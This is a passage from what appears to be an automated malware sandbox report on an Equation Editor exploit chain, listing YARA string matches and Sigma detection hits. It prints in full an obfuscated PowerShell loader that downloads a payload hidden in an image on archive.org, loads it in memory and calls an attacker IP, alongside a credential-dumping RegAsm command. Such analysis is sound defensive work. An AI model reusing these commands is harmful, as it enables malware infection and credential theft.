                  • 0x64b7c:$str_b2: Executing file:
                  • 0x65bfc:$str_b3: GetDirectListeningPort
                  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x65728:$str_b7: \update.vbs
                  • 0x64ba4:$str_b9: Downloaded file:
                  • 0x64b90:$str_b10: Downloading file:
                  • 0x64c34:$str_b12: Failed to upload file:
                  • 0x65bc4:$str_b13: StartForward
                  • 0x65be4:$str_b14: StopForward
                  • 0x65680:$str_b15: fso.DeleteFile "
                  • 0x65614:$str_b16: On Error Resume Next
                  • 0x656b0:$str_b17: fso.DeleteFolder "
                  • 0x64c24:$str_b18: Uploaded file:
                  • 0x64be4:$str_b19: Unable to delete:
                  • 0x65648:$str_b20: while fso.FileExists("
                  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 19 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 85.239.241.184, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3616, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3616, TargetFilename: C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ?
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3616, Protocol: tcp, SourceIp: 85.239.241.184, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ?
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3616, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , ProcessId: 3756, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3616, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , ProcessId: 3756, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ?
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 4008, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp", ProcessId: 3184, ProcessName: RegAsm.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? 